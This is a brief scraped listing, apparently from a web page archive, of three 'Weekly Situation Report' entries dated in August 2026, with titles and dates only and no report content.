Weekly Situation Report — 8/17/26Aug 20, 2026Weekly Situation Report — 8/10/26Aug 13, 2026Weekly Situation Report — 8/3/26Aug 6, 2026